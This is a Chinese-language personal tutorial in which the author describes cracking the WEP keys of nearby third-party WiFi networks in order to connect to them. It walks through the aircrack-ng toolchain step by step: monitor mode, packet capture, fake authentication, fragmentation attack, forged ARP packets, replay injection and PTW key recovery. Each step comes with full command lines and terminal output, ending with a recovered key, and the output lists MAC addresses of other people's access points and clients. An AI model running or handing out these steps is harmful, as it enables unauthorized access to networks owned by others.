出於興趣需要,想串連下多個地方的無線WIFI網路,結果都需要密鑰。所以就花了幾天時間照網上的方法破解下試試,終於被俺試出來了,過程如下:
1,我的網卡型號是RT73 USB Wireless LAN Card,以上名稱是在裝置管理員中顯示的完整名字,我在XP下裝了完整的原廠驅動,但在ubuntu裡面是什麼驅動都沒有裝。
2,首先需要瞭解當前環境下目標WIFI網的名字,頻道號。我是用USB引導進入BT3這個工具,進入案頭後,點擊裡面的WIFI assistant工具,就可以顯示當前的網路名稱字和頻道號。記下即可。比如:我記下了當前網路名稱是:Micorlink_SZ,頻道號是11。
3,進入ubuntu,插入無線網卡,保證網卡是正常載入並識別的,正常的話會有一個提示框,顯示載入ralink RT73無線網卡。
4,建立立一個終端運行:ifconfig -a
終端顯示:
wlan0 Link encap:乙太網路 硬體地址 00:0c:43:2a:36:c4
BROADCAST MULTICAST MTU:1500 躍點數:1
接收資料包:0 錯誤:0 丟棄:0 過載:0 幀數:0
發送資料包:0 錯誤:0 丟棄:0 過載:0 載波:0
碰撞:0 發送隊列長度:1000
接收位元組:0 (0.0 B) 發送位元組:0 (0.0 B)
參數說明:顯示完整的PC網路設定。
功能:通過此命令可以得到自己的無線網卡的名字和MAC地址,備用。
5,終端運行:airmon-ng start wlan0 11
終端顯示:
Interface Chipset Driver
wlan0 Ralink 2573 USB rt73usb - [phy1] (monitor mode enabled on mon0)
參數說明:wlan0是自己的無線網卡載入名字,11是目標網開放的頻道號。
功能:第一次執行此命令,會提示安裝ai的XX軟體,用apt-get install安裝它要求的軟體即可。此命令是將自己的無線網卡置於monitor 模式,有抓包的功能。運行該命令成功後,會看到無線網卡升級成監控模式後的別名,就是mon0。如果發現弄錯了頻道可以多試幾次。
6,終端運行:airodump-ng --ivs -w name -c 11 mon0
終端顯示:
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:1D:73:DE:9C:F5 -55 71 16605 14114 12 11 54 . WEP WEP OPN Microlink_SZ
00:1D:0F:84:06:8C -53 0 31 0 0 6 54 . WEP WEP TP-LINK
00:1D:73:DE:A8:1D -63 99 17107 62334 11 11 54 . WEP WEP OPN Microlink_SZ
BSSID STATION PWR Rate Lost Packets Probes
(not associated) 00:11:F6:88:14:D6 -69 0 - 1 0 61
(not associated) 00:1F:3A:97:B1:CE -71 0 - 1 0 92
00:1D:73:DE:9C:F5 00:1F:3B:16:00:CB -69 1 -12 8 5215 Microlink_SZ
00:1D:73:DE:9C:F5 00:1F:3B:A0:C2:1B -69 54 - 6 18 4707 WXYZ,Microlink_SZ
參數說明:BSSID是AP的MAC地址;PWR是AP訊號的強度大小,一般低於10就丟包比較嚴重,難破解;RXQ是幹擾的大小;Beacons是發送接收的包,在跳說明有資料;#Data是接收到的可以用來破解的特殊包,如果一直不變說明沒有用戶端串連,比較難破解;CH是頻道號;MB是網路連接速度,54就是54MB;ENC、CIPHER、AUTH是加密方式,顯示WEP的才可以破解;ESSID 是AP的名字,為了阻擋別人破解可以才用中文的名字。
功能:列出無線WIFI網的資訊。這個視窗開著就好了,不用管它。
7,建立一個終端,運行:aireplay-ng -1 0 -e Microlink_SZ -a 001d73dea81d -h 000c432a36c4 mon0
終端顯示:
10:44:54 Waiting for beacon frame (BSSID: 00:1D:73:DE:A8:1D) on channel 11
10:44:54 Sending Authentication Request (Open System) [ACK]
10:44:54 Authentication successful
10:44:54 Sending Association Request [ACK]
10:44:54 Association successful (AID: 1)
參數說明:Microlink_SZ是AP的名字;001d73dea81d是目標要破解網卡的MAC地址,由第六步可以得到,注意去掉中間的冒號;000c432a36c4是自己網卡的MAC地址,由第四步可以得到,也要去掉冒號;mon0是由第五步得到的監控名字。
功能:這個命令主要是針對#Data增長緩慢的AP,aireplay顧名思義就是重發類比發包的意思,是一條欺騙命令,串連上AP。如果執行成功,那麼會顯示 successful 。
8,終端運行:aireplay-ng -5 -b 001d73dea81d -h 000c432a36c4 mon0
終端顯示:
10:54:18 Waiting for beacon frame (BSSID: 00:1D:73:DE:A8:1D) on channel 11
10:54:18 Waiting for a data packet...
Read 27 packets...
Size: 88, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1D:73:DE:A8:1D
Dest. MAC = 00:1E:BE:C7:B8:CA
Source MAC = 00:1F:3A:52:BD:73
0x0000: 0841 2c00 001d 73de a81d 001f 3a52 bd73 .A,...s.....:R.s
0x0010: 001e bec7 b8ca f021 2d42 0000 31f4 7340 .......!-B..1.s@
0x0020: b50a bd80 41fc 1d01 5103 5ec1 21fa 4a5e ....A...Q.^.!.J^
0x0030: f423 aced ff21 8623 664c 815b f58c f6e7 .#...!.#fL.[....
0x0040: 8b8c 2b31 4319 2a9e f99c e895 af6a bb13 ..+1C.*......j..
0x0050: dd55 d2d7 0eda 68da .U....h.
Use this packet ? y
Saving chosen packet in replay_src-0415-105425.cap
10:55:12 Data packet found!
10:55:12 Sending fragmented packet
10:55:12 Got RELAYED packet!!
10:55:12 Trying to get 384 bytes of a keystream
10:55:12 Got RELAYED packet!!
10:55:12 Trying to get 1500 bytes of a keystream
10:55:13 Got RELAYED packet!!
Saving keystream in fragment-0415-105512.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
參數說明:001d73dea81d 是目標破解的AP的MAC地址;000c432a36c4 是自己網卡的MAC地址;mon0是監控別名。
功能:上一條成功後,開始收集#Data的資料,才能夠進行類比破解。如果#Data沒有增加,該命令會一直執行,直到捕獲一個#Data包。之後,程式會問你是否用這個包來類比攻擊,回答Y即可。如果攻擊成功,則會顯示。成功之後會顯示一個檔案名稱:fragment-xxxx-xxxx.xor檔案,這個檔案馬上就會用到,該檔案是儲存在root目錄下(我自己的電腦)。
9,終端運行:packetforge-ng -0 -a 001d73dea81d -h 000c432a36c4 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0415-105512.xor -w mrarp
終端顯示:
Wrote packet to: mrarp
參數說明:001d73dea81d 是待破解的MAC地址;000c432a36c4 是自己的MAC地址;fragment-0415-105512.xor就是第八步顯示的檔案名稱;
功能:破解包的準備過程,顯示組建檔案到mrarp。
10,終端運行:aireplay-ng -2 -r mrarp -x 512 mon0
終端顯示:
No source MAC (-h) specified. Using the device MAC (00:0C:43:2A:36:C4)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:1D:73:DE:A8:1D
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:0C:43:2A:36:C4
0x0000: 0841 0201 001d 73de a81d 000c 432a 36c4 .A....s.....C*6.
0x0010: ffff ffff ffff 8001 e4cb 8500 0039 fd12 .............9..
0x0020: 169e 7a6a b98d 8bd7 08d9 6bb3 fed2 5890 ..zj......k...X.
0x0030: d1bc d1ef 2bfe 0ec7 b11d 3032 246e 40c9 ....+.....02$n@.
0x0040: a65a 27af .Z'.
Use this packet ? y
Saving chosen packet in replay_src-0415-110249.cap
sending package xxxx.
參數說明:mon0是自己的無線網卡監聽裝置別名;512 是攻擊速度,1024是最大值,一般512即可。
功能:這一步開始後,選擇Y會看到sending 的package 數量在增加,同時第一個終端裡面顯示的#Data也在快速增加,只需等待即可。
11,建立終端運行:aircrack-ng -n 64 -b 001d73dea81d name-01.ivs
終端顯示:
Opening name-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 40103 ivs.
Aircrack-ng 1.0 rc3
[00:00:11] Tested 8 keys (got 40982 IVs)
KB depth byte(vote)
0 0/ 1 36(58156) 8A(48492) B5(48016) 86(47920) 19(47676)
1 0/ 1 39(52472) 83(47580) B2(46496) D0(46448) 29(46312)
2 0/ 1 39(53488) 22(48804) FC(48144) 85(48108) 55(47784)
3 0/ 1 39(54596) A7(48580) 46(48568) 76(48392) 22(47804)
4 0/ 7 04(48432) BD(47996) 04(47680) B9(47524) 17(47376)
KEY FOUND! [ 36:39:39:39:39 ] (ASCII: 69999 )
Decrypted correctly: 100%
參數說明:001d73dea81d 是要破解的目標MAC地址;name-01.ivs是之前產生的一個檔案,在root目錄下以name-xx.ivs命名,尋找最大編號的那個。
功能:只要#Data達到10000以上,一會兒就會顯示破解出來的密碼,同時會顯示對應的ASCII碼。如果運氣不好,多等待一下即可。
參考文章:http://www.city009.cn/wep-wap-pojie-8.html